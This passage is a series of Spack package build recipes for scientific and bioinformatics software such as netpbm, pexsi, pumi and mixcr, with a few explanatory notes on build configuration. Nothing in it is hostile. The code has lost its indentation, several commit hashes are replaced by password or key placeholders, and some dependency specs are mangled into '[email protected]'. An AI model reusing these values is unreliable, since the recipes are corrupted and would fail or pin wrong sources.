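    'LDFLAGS=-O3',
    '--file=Makefile_mpi_only',
]
print('make ' + ' '.join(targets))  # parallel=False, so no -j flag
```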
#### File: packages/mixcr/package.py
```python
from spack.package import *
class Mixcr(Package):
"""MiXCR is a universal framework that processes big immunome data from
raw sequences to quantitated clonotypes. MiXCR efficiently handles
paired- and single-end reads, considers sequence quality, corrects PCR
errors and identifies germline hypermutations. The software supports
both partial- and full-length profiling and employs all available RNA or
DNA information, including sequences upstream of V and downstream of J
gene segments."""
homepage = "https://mixcr.readthedocs.io/en/master/index.html"
url = "https://github.com/milaboratory/mixcr/releases/download/v3.0.2/mixcr-3.0.2.zip"
version('3.0.2', sha256='b4dcad985053438d5f5590555f399edfbd8cb514e1b9717620ee0ad0b5eb6b33')
depends_on('java@8:')
def install(self, spec, prefix):
install_tree('.', prefix)
def setup_run_environment(self, env):
env.prepend_path('PATH', self.prefix)
```
#### File: packages/mysqlpp/package.py
```python
from spack.package import *
class Mysqlpp(AutotoolsPackage):
"""MySQL++ is a C++ wrapper for MySQL and MariaDB C APIs. It is built on
the same principles as the Standard C++ Library to make dealing with the
database as easy as dealing with std containers. MySQL++ also provides
facilities that let you avoid the most repetitive sorts of SQL within your
own code, providing native C++ interfaces for these common tasks."""
homepage = "https://tangentsoft.com/mysqlpp/home"
url = "https://tangentsoft.com/mysqlpp/releases/mysql++-3.2.5.tar.gz"
version('3.3.0', sha256='449cbc46556cc2cc9f9d6736904169a8df6415f6960528ee658998f96ca0e7cf')
version('3.2.5', sha256='839cfbf71d50a04057970b8c31f4609901f5d3936eaa86dab3ede4905c4db7a8')
depends_on('mysql-client')
def configure_args(self):
if '^mariadb-c-client' in self.spec:
args = [
'--with-mysql-include={0}'.format(
self.spec['mysql-client'].prefix.include.mariadb),
'--with-mysql-lib={0}'.format(
self.spec['mysql-client'].prefix.lib.mariadb),
]
else:
args = [
'--with-mysql={0}'.format(self.spec['mysql-client'].prefix),
]
return args
```
#### File: packages/netpbm/package.py
```python
import os
from shutil import copyfile
from spack.package import *
class Netpbm(MakefilePackage):
"""Netpbm - graphics tools and converters.
A whole bunch of utilities for primitive manipulation of
graphic images. Wide array of converters
from one graphics format to another. E.g.
from g3 fax format to jpeg. Many basic graphics
editing tools such as magnifying and cropping.
"""
homepage = "http://netpbm.sourceforge.net"
url = "https://sourceforge.net/projects/netpbm/files/super_stable/10.73.35/netpbm-10.73.35.tgz"
maintainers = ['cessenat']
version('10.73.35', sha256='628dbe8490bc43557813d1fedb2720dfdca0b80dd3f2364cb2a45c6ff04b0f18')
# By default we wish to compile absolutely everything at once.
# Variants are provided in case compilation is a problem.
variant('all', default=True,
description='Enable all 3rd party libs')
variant('X', default=True,
description='Enable X libs for pamx')
variant('fiasco', default=True,
description='Enable fiasco')
variant('ghostscript', default=True,
description='Ghostscript is called by pstopnm and pbmtextps')
# netpbm can provide its own jasper and jbig: better to use the ones
# from their respective spack packages.
variant('builtin', default=False,
description='Use builtin libs instead of 3rd party')
depends_on('perl', type=('build', 'run'))
depends_on('gmake', type='build')
depends_on('pkgconfig', type='build')
# These are general prerequisites indicated at
# http://netpbm.sourceforge.net/prereq.html
depends_on('zlib')
depends_on('jpeg')
depends_on('libtiff')
depends_on('libpng')
# Ghostscript is called as "gs" by pstopnm and pbmtextps
depends_on('ghostscript', type='run', when='+ghostscript')
# These are the optional libs:
# svgtopam : http://netpbm.sourceforge.net/prereq.html
# homebrew also sets a dependency on libxml2
# https://github.com/Homebrew/homebrew-core/blob/HEAD/Formula/netpbm.rb
depends_on('libxml2', when='+all')
# thinkjettopbm : http://netpbm.sourceforge.net/prereq.html
depends_on('flex', type=('build', 'run'), when='+all')
# https://formulae.brew.sh/formula/netpbm
depends_on('jasper', when='+all~builtin')
# Only MacPorts sets a dependency on jbig
# https://ports.macports.org/port/netpbm/summary
depends_on('jbigkit', when='+all~builtin')
# pamx depends on X11 libraries:
depends_on('libx11', when='+X')
def edit(self, spec, prefix):
# We'd better not run the interactive perl script buildtools/configure.pl
# as explained by Todd in
# https://groups.google.com/g/spack/c/8sEqDkZ68DA/m/wpbB0wHaAgAJ
# so we will mimic the perl script's behavior
copyfile('config.mk.in', 'config.mk')
config = []
config.append('####Lines above were copied from config.mk.in')
# This is already the default but we make sure it is set
# even for a dev release for instance:
config.append('DEFAULT_TARGET = nonmerge')
config.append('NETPBMLIBSUFFIX={0}'.format(dso_suffix))
if 'platform=darwin' in spec:
config.append('NETPBMLIBTYPE=dylib')
args = ['-dynamiclib', '-Wl,-install_name']
args.append('-Wl,@rpath/libnetpbm.dylib')
config.append('LDSHLIB = {0}'.format(' '.join(args)))
elif 'platform=cygwin' in spec:
config.append('NETPBMLIBTYPE=dll')
config.append('NETPBMLIBSUFFIX=dll')
config.append('SHLIBPREFIXLIST=cyg lib')
config.append('EXE = .exe')
config.append('SYMLINK = cp')
config.append('LINKERISCOMPILER = Y')
config.append('WINICON_OBJECT = $(BUILDDIR)/icon/netpbm.o')
config.append('DLLVER=$(NETPBM_MAJOR_RELEASE)')
args = ['-shared', '-Wl,--image-base=0x10000000']
args.append('-Wl,--enable-auto-import')
config.append('LDSHLIB = {0}'.format(' '.join(args)))
else:
config.append('NETPBMLIBTYPE=unixshared')
if '~fiasco' in spec:
config.append('BUILD_FIASCO = N')
config.append('STATICLIB_TOO=Y')
config.append('OMIT_NETWORK = Y')
config.append('CC = {0}'.format(spack_cc))
config.append('LD = {0}'.format(spack_cc))
config.append('CC_FOR_BUILD = {0}'.format(spack_cc))
config.append('LD_FOR_BUILD = {0}'.format(spack_cc))
config.append('CFLAGS_SHLIB += {0}'.format(self.compiler.cc_pic_flag))
if '%gcc' in spec or 'platform=darwin' in spec:
cflags = ['-O3', '-ffast-math', '-pedantic', '-Wall', '-Wimplicit']
cflags.extend(['-Wno-uninitialized', '-Wmissing-declarations'])
cflags.extend(['-Wwrite-strings', '-Wmissing-prototypes'])
cflags.extend(['-Wundef', '-Wno-unknown-pragmas'])
if 'platform=darwin' in spec:
# https://github.com/macports/macports-ports/blob/master/graphics/netpbm/Portfile
cflags.append('-D_DARWIN_C_SOURCE')
# https://www.linuxquestions.org/questions/linux-from-scratch-13/can't-compile-luit-xorg-applications-4175476308/
# cflags.append('-U_XOPEN_SOURCE')
# https://www.mistys-internet.website/blog/blog/2013/10/19/no-cpp-precomp-the-compiler-flag-that-time-forgot/
# cflags.append('-no-cpp-precomp')
config.append('CFLAGS = {0}'.format(' '.join(cflags)))
config.append('CFLAGS_SHLIB += -fno-common')
if '+all' in spec:
flex = join_path(spec['flex'].prefix.bin, 'flex')
if os.path.exists(flex):
config.append('LEX = {0}'.format(flex))
config.append('TIFFLIB={0}'.format(
spec['libtiff'].libs.ld_flags))
config.append('TIFFHDR_DIR={0}'.format(
spec['libtiff'].headers.directories[0]))
config.append('PNGLIB={0}'.format(
spec['libpng'].libs.ld_flags))
config.append('PNGHDR_DIR={0}'.format(
spec['libpng'].headers.directories[0]))
config.append('JPEGLIB={0}'.format(
spec['jpeg'].libs.ld_flags))
config.append('JPEGHDR_DIR={0}'.format(
spec['jpeg'].headers.directories[0]))
if '+all' in spec and '+builtin' not in spec:
config.append('JASPERLIB={0}'.format(
spec['jasper'].libs.ld_flags))
config.append('JASPERHDR_DIR={0}'.format(
spec['jasper'].headers.directories[0]))
config.append('JBIGLIB={0}'.format(
spec['jbigkit'].libs.ld_flags))
config.append('JBIGHDR_DIR={0}'.format(
spec['jbigkit'].headers.directories[0]))
if '+X' in spec:
pkg_config = which('pkg-config')
if not pkg_config('x11', '--exists'):
config.append('X11LIB={0}'.format(
spec['libx11'].libs.ld_flags))
config.append('X11HDR_DIR={0}'.format(
spec['libx11'].headers.directories[0]))
config.append('ZLIB={0}'.format(spec['zlib'].libs.ld_flags))
config.append('NETPBM_DOCURL = http://netpbm.sourceforge.net/doc/')
if spec.target.family == 'x86_64':
config.append('WANT_SSE = Y')
with open('config.mk', 'a') as mk:
mk.write('\n'.join(config))
def build(self, spec, prefix):
make()
def install(self, spec, prefix):
bdir = join_path(self.build_directory, 'build')
make('package', 'pkgdir={0}'.format(bdir), parallel=False)
# Same as before build, mimic the interactive
# perl script buildtools/installnetpbm.pl
mkdirp(prefix.bin)
mkdirp(prefix.lib)
mkdirp(prefix.include)
mkdirp(prefix.man)
with working_dir('build'):
install_tree("bin", prefix.bin)
install_tree("lib", prefix.lib)
install_tree("misc", prefix.lib)
install_tree("include", prefix.include)
install_tree(join_path("include", "netpbm"), prefix.include)
if os.path.exists('man'):
install_tree("man", prefix.man)
# As a default a static lib is also created.
# We could put that as an option
staticlib = join_path('staticlink', 'libnetpbm.a')
if os.path.exists(staticlib):
install(staticlib, prefix.lib)
else:
staticlib = join_path('link', 'libnetpbm.a')
if os.path.exists(staticlib):
install(staticlib, prefix.lib)
# Make the .pc as done by installnetpbm.pl
src = join_path('buildtools', 'pkgconfig_template')
pdir = join_path(prefix.lib, 'pkgconfig')
mkdirp(pdir)
copyfile(src, join_path(pdir, 'netpbm.pc'))
pfic = FileFilter(join_path(pdir, 'netpbm.pc'))
pfic.filter('@VERSION@', 'Netpbm {0}'.format(str(spec.version)))
pfic.filter('@LINKDIR@', '{0}'.format(prefix.lib))
pfic.filter('@INCLUDEDIR@', '{0}'.format(prefix.include))
```
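The `edit()` phase above stands in for `buildtools/configure.pl` by copying the template and appending computed settings. A condensed, runnable sketch of that copy-then-append pattern (assumes a `config.mk.in` in the working directory; the settings list is trimmed):
```python
from shutil import copyfile

copyfile('config.mk.in', 'config.mk')
settings = [
    '####Lines above were copied from config.mk.in',
    'DEFAULT_TARGET = nonmerge',
    'NETPBMLIBTYPE=unixshared',
    'STATICLIB_TOO=Y',
    'OMIT_NETWORK = Y',
]
with open('config.mk', 'a') as mk:
    mk.write('\n'.join(settings))
```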
#### File: packages/nnvm/package.py
```python
from spack.package import *
class Nnvm(CMakePackage):
"""nnvm is a modular, decentralized and lightweight
part to help build deep learning libraries."""
homepage = "https://github.com/dmlc/nnvm"
git = "https://github.com/dmlc/nnvm.git"
version('master', branch='master')
version('20170418', commit='<PASSWORD>')
variant('shared', default=True, description='Build a shared NNVM lib.')
depends_on('dmlc-core')
patch('cmake.patch')
patch('cmake2.patch', when='@20170418')
def cmake_args(self):
spec = self.spec
return [
self.define_from_variant('USE_SHARED_NNVM', 'shared'),
'-DUSE_STATIC_NNVM=%s' % ('ON' if '~shared' in spec else 'OFF'),
]
```
#### File: packages/openwsman/package.py
```python
from spack.package import *
class Openwsman(CMakePackage):
"""Openwsman server implementation and client api with bindings."""
homepage = "https://github.com/Openwsman/openwsman"
url = "https://github.com/Openwsman/openwsman/archive/v2.6.11.tar.gz"
version('2.7.0', sha256='8870c4a21cbaba9387ad38c37667e2cee29008faacaaf7eb18ad2061e2fc89a1')
version('2.6.11', sha256='895eaaae62925f9416766ea3e71a5368210e6cfe13b23e4e0422fa0e75c2541c')
version('2.6.10', sha256='d3c624a03d7bc1835544ce1af56efd010f77cbee0c02b34e0755aa9c9b2c317b')
variant('python', default=True, description='Enable python')
extends('python', when='+python')
depends_on('python', type=('build', 'link', 'run'))
depends_on('curl', type='link')
depends_on('swig', type='build')
depends_on('libxml2', type='link')
depends_on('openssl', type='link')
depends_on('sblim-sfcc', type='link')
def patch(self):
""" Change python install directory. """
if self.spec.satisfies('+python'):
python_spec = self.spec['python']
python_libdir = join_path(
self.spec.prefix.lib,
'python' + str(python_spec.version.up_to(2)),
'site-packages'
)
filter_file(
'DESTINATION .*',
'DESTINATION {0} )'.format(python_libdir),
join_path('bindings', 'python', 'CMakeLists.txt')
)
def cmake_args(self):
define = self.define
spec = self.spec
arg = [
define('BUILD_PERL', False),
define('BUILD_JAVA', False),
define('BUILD_CSHARP', False),
define('USE_PAM', 'OFF'),
]
if spec.satisfies('+python'):
if spec.satisfies('^python@3:'):
arg.extend([
define('BUILD_PYTHON', False),
define('BUILD_PYTHON3', True)
])
else:
arg.extend([
define('BUILD_PYTHON', True),
define('BUILD_PYTHON3', False)
])
arg.append(define('PYTHON_EXECUTABLE',
spec['python'].command.path))
else:
arg.extend([
define('BUILD_PYTHON', False),
define('BUILD_PYTHON3', False)
])
return arg
def flag_handler(self, name, flags):
flags = list(flags)
if name == 'cflags':
if self.spec.satisfies('%gcc'):
flags.append('-std=gnu99')
else:
flags.append(self.compiler.c99_flag)
return (None, None, flags)
```
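The `flag_handler` above returns a three-slot tuple; as we understand Spack's convention, the slots are (inject via compiler wrapper, set in the build environment, pass to the build system), so `(None, None, flags)` hands the C flags to CMake directly. A sketch of that dispatch:
```python
def route_cflags(flags, via='build_system'):
    # Illustrative model of the (inject, env, build_system) triple.
    if via == 'wrapper':
        return (flags, None, None)
    if via == 'env':
        return (None, flags, None)
    return (None, None, flags)  # what the package above uses

assert route_cflags(['-std=gnu99']) == (None, None, ['-std=gnu99'])
```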
#### File: packages/ovito/package.py
```python
from spack.package import *
class Ovito(Package):
"""OVITO is a scientific visualization and analysis software for atomistic
and particle simulation data. It helps scientists gain better insights into
materials phenomena and physical processes. OVITO Basic is freely available
for all major platforms under an open source license. It has served in a
growing number of computational simulation studies as a powerful tool to
analyze, understand and illustrate simulation results."""
homepage = "https://www.ovito.org"
url = "https://www.ovito.org/download/master/ovito-basic-3.6.0-x86_64.tar.xz"
version('3.6.0', '6ac43a3a39b1ec3cccab577602756a8b7010cc1f1f046c4f6a939590d12f0339')
def install(self, spec, prefix):
# Once we've unpacked the tarball, copy its contents to the prefix
copy_tree('.', prefix)
```
#### File: packages/parallelmergetree/package.py
```python
from spack.package import *
class Parallelmergetree(CMakePackage):
"""A multi-runtime implementation of a distributed merge tree
segmentation algorithm. The implementation relies on the framework
BabelFlow, which allows to execute the algorithm on different runtime
systems."""
homepage = "https://bitbucket.org/cedmav/parallelmergetree"
git = "https://bitbucket.org/cedmav/parallelmergetree.git"
maintainers = ['spetruzza']
version('1.1.2',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.2',
submodules=True)
version('1.1.1',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.1',
submodules=True)
version('1.1.0',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.0',
submodules=True)
version('1.0.2',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.0.2',
submodules=True)
version('1.0.0',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.0.0',
submodules=True)
depends_on('[email protected]', when='@1.1.2')
depends_on('[email protected]', when='@1.1.1')
depends_on('[email protected]', when='@1.1.0')
depends_on('[email protected]', when='@1.0.2')
variant("shared", default=True, description="Build ParallelMergeTree as shared libs")
# The C++ headers of gcc-11 no longer include <algorithm> as a side effect of other headers
@when('%gcc@11:')
def setup_build_environment(self, env):
env.append_flags('CXXFLAGS', '-include algorithm')
def cmake_args(self):
args = []
if "+shared" in self.spec:
args.append('-DBUILD_SHARED_LIBS=ON')
else:
args.append('-DBUILD_SHARED_LIBS=OFF')
args.append('-DLIBRARY_ONLY=ON')
args.append('-DBabelFlow_DIR={0}'.format(
self.spec['babelflow'].prefix))
return args
```
#### File: packages/perl-db-file/package.py
```python
from spack.package import *
class PerlDbFile(PerlPackage):
"""DB_File is a module which allows Perl programs to make use of the
facilities provided by Berkeley DB version 1.x (if you have a newer version
of DB, see "Using DB_File with Berkeley DB version 2 or greater").
It is assumed that you have a copy of the Berkeley DB manual pages at hand
when reading this documentation. The interface defined here mirrors the
Berkeley DB interface closely."""
homepage = "https://metacpan.org/pod/DB_File"
url = "https://cpan.metacpan.org/authors/id/P/PM/PMQS/DB_File-1.840.tar.gz"
version('1.840', sha256='b7864707fad0f2d1488c748c4fa08f1fb8bcfd3da247c36909fd42f20bfab2c4')
depends_on('perl-extutils-makemaker', type='build')
depends_on('berkeley-db', type='build')
def patch(self):
filter_file('/usr/local/BerkeleyDB',
self.spec['berkeley-db'].prefix, 'config.in')
```
#### File: packages/pexsi/package.py
```python
import inspect
import os.path
from spack.package import *
class Pexsi(MakefilePackage):
"""The PEXSI library is written in C++, and uses message passing interface
(MPI) to parallelize the computation on distributed memory computing
systems and achieve scalability on more than 10,000 processors.
The Pole EXpansion and Selected Inversion (PEXSI) method is a fast
method for electronic structure calculation based on Kohn-Sham density
functional theory. It efficiently evaluates certain selected elements
of matrix functions, e.g., the Fermi-Dirac function of the KS Hamiltonian,
which yields a density matrix. It can be used as an alternative to
diagonalization methods for obtaining the density, energy and forces
in electronic structure calculations.
"""
homepage = 'https://math.berkeley.edu/~linlin/pexsi/index.html'
url = 'https://math.berkeley.edu/~linlin/pexsi/download/pexsi_v0.9.0.tar.gz'
# version('1.0', sha256='1574c66fd69ff2a37c6250d65c4df43b57c79822b49bd65662582a0cd5d82f54')
version('0.10.2', sha256='8714c71b76542e096211b537a9cb1ffb2c28f53eea4f5a92f94cc1ca1e7b499f')
version('0.9.0', sha256='e5efe0c129013392cdac3234e37f1f4fea641c139b1fbea47618b4b839d05029')
depends_on('parmetis')
depends_on('[email protected]:5.3', when='@0.10.2:')
variant(
'fortran', default=False, description='Builds the Fortran interface'
)
parallel = False
def edit(self, spec, prefix):
substitutions = [
('@MPICC', self.spec['mpi'].mpicc),
('@MPICXX_LIB', self.spec['mpi:cxx'].libs.joined()),
('@MPICXX', self.spec['mpi'].mpicxx),
('@MPIFC', self.spec['mpi'].mpifc),
('@RANLIB', 'ranlib'),
('@PEXSI_STAGE', self.stage.source_path),
('@SUPERLU_PREFIX', self.spec['superlu-dist'].prefix),
('@METIS_PREFIX', self.spec['metis'].prefix),
('@PARMETIS_PREFIX', self.spec['parmetis'].prefix),
('@LAPACK_PREFIX', self.spec['lapack'].prefix),
('@BLAS_PREFIX', self.spec['blas'].prefix),
('@LAPACK_LIBS', self.spec['lapack'].libs.joined()),
('@BLAS_LIBS', self.spec['blas'].libs.joined()),
# FIXME : what to do with compiler provided libraries ?
('@STDCXX_LIB', ' '.join(self.compiler.stdcxx_libs))
]
fldflags = ''
if '@0.9.2' in self.spec:
fldflags += ' -Wl,--allow-multiple-definition'
if ('^superlu +openmp' in self.spec
or '^openblas threads=openmp' in self.spec):
fldflags += ' ' + self.compiler.openmp_flag
substitutions.append(('@FLDFLAGS', fldflags.lstrip()))
template = join_path(
os.path.dirname(inspect.getmodule(self).__file__),
'make.inc'
)
makefile = join_path(
self.stage.source_path,
'make.inc'
)
copy(template, makefile)
for key, value in substitutions:
filter_file(key, value, makefile)
def build(self, spec, prefix):
super(Pexsi, self).build(spec, prefix)
if '+fortran' in self.spec:
make('-C', 'fortran')
def install(self, spec, prefix):
# 'make install' does not exist, despite what the documentation says
mkdirp(self.prefix.lib)
install(
join_path(self.stage.source_path, 'src', 'libpexsi_linux.a'),
join_path(self.prefix.lib, 'libpexsi.a')
)
install_tree(
join_path(self.stage.source_path, 'include'),
self.prefix.include
)
# fortran "interface"
if '+fortran' in self.spec:
install_tree(
join_path(self.stage.source_path, 'fortran'),
join_path(self.prefix, 'fortran')
)
```
#### File: packages/phred/package.py
```python
import os
from spack.package import *
class Phred(MakefilePackage):
"""The phred software reads DNA sequencing trace files, calls bases,
and assigns a quality value to each called base."""
homepage = "http://www.phrap.org/phredphrapconsed.html"
url = "file://{0}/phred.tar.gz".format(os.getcwd())
manual_download = True
version('071220', sha256='26212f13fa906c1ca0af61f48d52a5f2c1aacba802bf729ba65ca5222463abce')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('phred', prefix.bin)
```
#### File: packages/phylip/package.py
```python
from spack.package import *
class Phylip(Package):
"""PHYLIP (the PHYLogeny Inference Package) is a package of programs for
inferring phylogenies (evolutionary trees)."""
homepage = "https://evolution.genetics.washington.edu/phylip/"
url = "https://evolution.gs.washington.edu/phylip/download/phylip-3.697.tar.gz"
version('3.697', sha256='9a26d8b08b8afea7f708509ef41df484003101eaf4beceb5cf7851eb940510c1')
def install(self, spec, prefix):
with working_dir('src'):
if self.spec.satisfies('platform=darwin'):
make('all', '-f', 'Makefile.osx')
make('put', '-f', 'Makefile.osx')
else:
make('all', '-f', 'Makefile.unx')
make('put', '-f', 'Makefile.unx')
install_tree('exe', prefix.bin)
```
#### File: packages/pinfo/package.py
```python
from spack.package import *
class Pinfo(AutotoolsPackage):
"""Pinfo is user-friendly, console-based viewer for Info documents."""
homepage = "https://github.com/baszoetekouw/pinfo"
url = "https://github.com/baszoetekouw/pinfo/archive/v0.6.13.tar.gz"
version('0.6.13', sha256='9dc5e848a7a86cb665a885bc5f0fdf6d09ad60e814d75e78019ae3accb42c217')
version('0.6.12', sha256='82af48ba23b8c26b1f4e67b45f718142eb0f760326b782f80c765801d3532077')
version('0.6.11', sha256='fd26017ac9db179d709b49e450c3097e7d6f99cd94de7b5da824ec757c6992b2')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('gettext', type='build')
depends_on('texinfo', type='build')
def configure_args(self):
args = ['CFLAGS=-Wno-unused-parameter']
return args
```
#### File: packages/ppopen-appl-fvm/package.py
```python
from spack.package import *
class PpopenApplFvm(MakefilePackage):
"""
ppOpen-APPL/FVM is a coupling library that enables weak
coupling of various simulation models, such as an
atmospheric model and an ocean model, or a seismic model
and a structure model. To achieve wide applicability,
ppohMATHMP is designed to be independent of grid
structure. Instead of a grid structure, ppOpen-APPL/FVM
requires a data set called a 'mapping table'. A mapping
table is composed of a correspondence table of grid
indexes between a sending model and a receiving model
plus interpolation coefficients. A subroutine for making
a mapping table file is provided by the ppohMATHMP API.
The current version of ppohMATHMP is ver.1.0, which
targets scalar data exchange. An exchange code for
vector data, which requires rotation calculation, is
under development.
"""
homepage = "http://ppopenhpc.cc.u-tokyo.ac.jp/ppopenhpc/"
git = "https://github.com/Post-Peta-Crest/ppOpenHPC.git"
version('master', branch='APPL/FVM')
depends_on('mpi')
depends_on('metis@:4')
def edit(self, spec, prefix):
mkdirp('bin')
mkdirp('lib')
mkdirp('include')
fflags = ['-O3']
if spec.satisfies('%gcc'):
fflags.append('-ffree-line-length-none')
makefile_in = FileFilter('Makefile.in')
makefile_in.filter(
r'^PREFIX *=.*$',
'PREFIX = {0}'.format(prefix)
)
makefile_in.filter(
r'^METISDIR *=.*$',
'METISDIR = {0}'.format(spec['metis'].prefix.lib)
)
makefile_in.filter('mpifrtpx', spec['mpi'].mpifc)
makefile_in.filter('frtpx', spack_fc)
makefile_in.filter('-Kfast', ' '.join(fflags))
makefile_in.filter(
',openmp',
' {0}'.format(self.compiler.openmp_flag)
)
def install(self, spec, prefix):
make('install')
install_tree('examples', prefix.examples)
install_tree('doc', prefix.doc)
```
#### File: packages/prinseq-lite/package.py
```python
from spack.package import *
class PrinseqLite(Package):
"""PRINSEQ will help you to preprocess your genomic or metagenomic
sequence data in FASTA or FASTQ format."""
homepage = "http://prinseq.sourceforge.net"
url = "https://sourceforge.net/projects/prinseq/files/standalone/prinseq-lite-0.20.4.tar.gz"
version('0.20.4', sha256='9b5e0dce3b7f02f09e1cc7e8a2dd77c0b133e5e35529d570ee901f53ebfeb56f')
variant('nopca', default=True, description="Graphs version without PCA")
depends_on('perl', type='run')
depends_on('perl-cairo', type='run')
depends_on('perl-digest-md5', type='run')
depends_on('perl-json', type='run')
def install(self, spec, prefix):
mkdirp(prefix.bin)
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-graphs-noPCA.pl')
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-lite.pl')
install('prinseq-graphs-noPCA.pl', prefix.bin)
install('prinseq-lite.pl', prefix.bin)
chmod = which('chmod')
chmod('+x', join_path(self.prefix.bin, 'prinseq-graphs-noPCA.pl'))
chmod('+x', join_path(self.prefix.bin, 'prinseq-lite.pl'))
```
#### File: packages/psm/package.py
```python
from spack.package import *
class Psm(MakefilePackage):
"""Intel Performance scaled messaging library"""
homepage = "https://github.com/intel/psm"
url = "https://github.com/intel/psm/archive/v3.3.tar.gz"
git = "https://github.com/intel/psm.git"
version('3.3', sha256='034b10e24d9f2967ef0f8d0f828572295e89cdfa1ba30c35e288b9b23c3dab8f', preferred=True)
version('2017-04-28', commit='<PASSWORD>')
conflicts('%gcc@6:', when='@3.3')
depends_on('uuid')
def edit(self, spec, prefix):
makefile = FileFilter('Makefile')
makefile.filter('{DESTDIR}/usr/', '{LOCAL_PREFIX}/')
def install(self, spec, prefix):
make('LOCAL_PREFIX=%s' % prefix, 'install')
```
#### File: packages/pumi/package.py
```python
from spack.package import *
class Pumi(CMakePackage):
"""SCOREC RPI's Parallel Unstructured Mesh Infrastructure (PUMI).
An efficient distributed mesh data structure and methods to support
parallel adaptive analysis including general mesh-based operations,
such as mesh entity creation/deletion, adjacency and geometric
classification, iterators, arbitrary (field) data attachable to mesh
entities, efficient communication involving entities duplicated
across multiple tasks, migration of mesh entities between tasks,
and dynamic load balancing."""
homepage = "https://www.scorec.rpi.edu/pumi"
git = "https://github.com/SCOREC/core.git"
maintainers = ['cwsmith']
tags = ['e4s']
# We will use the scorec/core master branch as the 'nightly' version
# of pumi in spack. The master branch is more stable than the
# scorec/core develop branch and we prefer not to expose spack users
# to the added instability.
version('master', submodules=True, branch='master')
version('2.2.7', submodules=True, commit='<KEY>') # tag 2.2.7
version('2.2.6', commit='<PASSWORD>') # tag 2.2.6
version('2.2.5', commit='73c16eae<PASSWORD>e45ec625a5abe4915bc5<PASSWORD>') # tag 2.2.5
version('2.2.4', commit='<PASSWORD>4a8e') # tag 2.2.4
version('2.2.3', commit='<KEY>') # tag 2.2.3
version('2.2.2', commit='<KEY>') # tag 2.2.2
version('2.2.1', commit='<PASSWORD>') # tag 2.2.1
version('2.2.0', commit='<PASSWORD>') # tag 2.2.0
version('2.1.0', commit='<PASSWORD>')
variant('int64', default=False, description='Enable 64bit mesh entity ids')
variant('shared', default=False, description='Build shared libraries')
variant('zoltan', default=False, description='Enable Zoltan Features')
variant('fortran', default=False, description='Enable FORTRAN interface')
variant('testing', default=False, description='Enable all tests')
variant('simmodsuite', default='none',
values=('none', 'base', 'kernels', 'full'),
description="Enable Simmetrix SimModSuite Support: 'base' enables "
"the minimum set of functionality, 'kernels' adds CAD kernel "
"support to 'base', and 'full' enables all functionality.")
variant('simmodsuite_version_check', default=True,
description="Enable check of Simmetrix SimModSuite version. "
"Disable the check for testing new versions.")
depends_on('mpi')
depends_on('cmake@3:', type='build')
depends_on('zoltan', when='+zoltan')
depends_on('zoltan+int64', when='+zoltan+int64')
simbase = "+base"
simkernels = simbase + "+parasolid+acis+discrete"
simfull = simkernels + "+abstract+adv+advmodel\
+import+paralleladapt+parallelmesh"
depends_on('simmetrix-simmodsuite' + simbase,
when='simmodsuite=base')
depends_on('simmetrix-simmodsuite' + simkernels,
when='simmodsuite=kernels')
depends_on('simmetrix-simmodsuite' + simfull,
when='simmodsuite=full')
def cmake_args(self):
spec = self.spec
args = [
'-DSCOREC_CXX_WARNINGS=OFF',
self.define_from_variant('ENABLE_ZOLTAN', 'zoltan'),
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
'-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
self.define_from_variant('PUMI_FORTRAN_INTERFACE', 'fortran'),
'-DMDS_ID_TYPE=%s' % ('long' if '+int64' in spec else 'int'),
'-DSKIP_SIMMETRIX_VERSION_CHECK=%s' %
('ON' if '~simmodsuite_version_check' in spec else 'OFF'),
self.define_from_variant('IS_TESTING', 'testing'),
'-DMESHES=%s' % join_path(self.stage.source_path, 'pumi-meshes')
]
if spec.satisfies('@2.2.3'):
args += ['-DCMAKE_CXX_STANDARD=11']
if self.spec.satisfies('simmodsuite=base'):
args.append('-DENABLE_SIMMETRIX=ON')
if self.spec.satisfies('simmodsuite=kernels') or \
self.spec.satisfies('simmodsuite=full'):
args.append('-DENABLE_SIMMETRIX=ON')
args.append('-DSIM_PARASOLID=ON')
args.append('-DSIM_ACIS=ON')
args.append('-DSIM_DISCRETE=ON')
mpi_id = spec['mpi'].name + spec['mpi'].version.string
args.append('-DSIM_MPI=' + mpi_id)
return args
def test(self):
if self.spec.version <= Version('2.2.6'):
return
exe = 'uniform'
options = ['../testdata/pipe.dmg', '../testdata/pipe.smb', 'pipe_unif.smb']
expected = 'mesh pipe_unif.smb written'
description = 'testing pumi uniform mesh refinement'
self.run_test(exe, options, expected, purpose=description,
work_dir=self.prefix.bin)
mpiexec = Executable(join_path(self.spec['mpi'].prefix.bin, 'mpiexec')).command
mpiopt = ['-n', '2']
exe = ['split']
options = ['../testdata/pipe.dmg', '../testdata/pipe.smb', 'pipe_2_.smb', '2']
expected = 'mesh pipe_2_.smb written'
description = 'testing pumi mesh partitioning'
self.run_test(mpiexec, mpiopt + exe + options, expected,
purpose=description, work_dir=self.prefix.bin)
```
#### File: packages/py-cmake/package.py
```python
from spack.package import *
class PyCmake(PythonPackage):
"""CMake is an open-source, cross-platform family of tools designed to
build, test and package software
"""
homepage = "https://cmake.org"
git = "https://github.com/scikit-build/cmake-python-distributions.git"
pypi = "cmake/cmake-3.22.2.tar.gz"
version('3.22.2', sha256='b5bd5eeb488b13cf64ec963800f3d979eaeb90b4382861b86909df503379e219')
version('3.21.4', sha256='30fa5ed8a5ad66dcd263adb87f3ce3dc2d0ec0ac3958f5becff577e4b62cd065')
version('3.18.0', sha256='52b98c5ee70b5fa30a8623e96482227e065292f78794eb085fdf0fecb204b79b')
depends_on('ninja', type='build')
depends_on('[email protected]:', type='build')
depends_on('py-setuptools@42:', type='build')
depends_on('git', type='build')
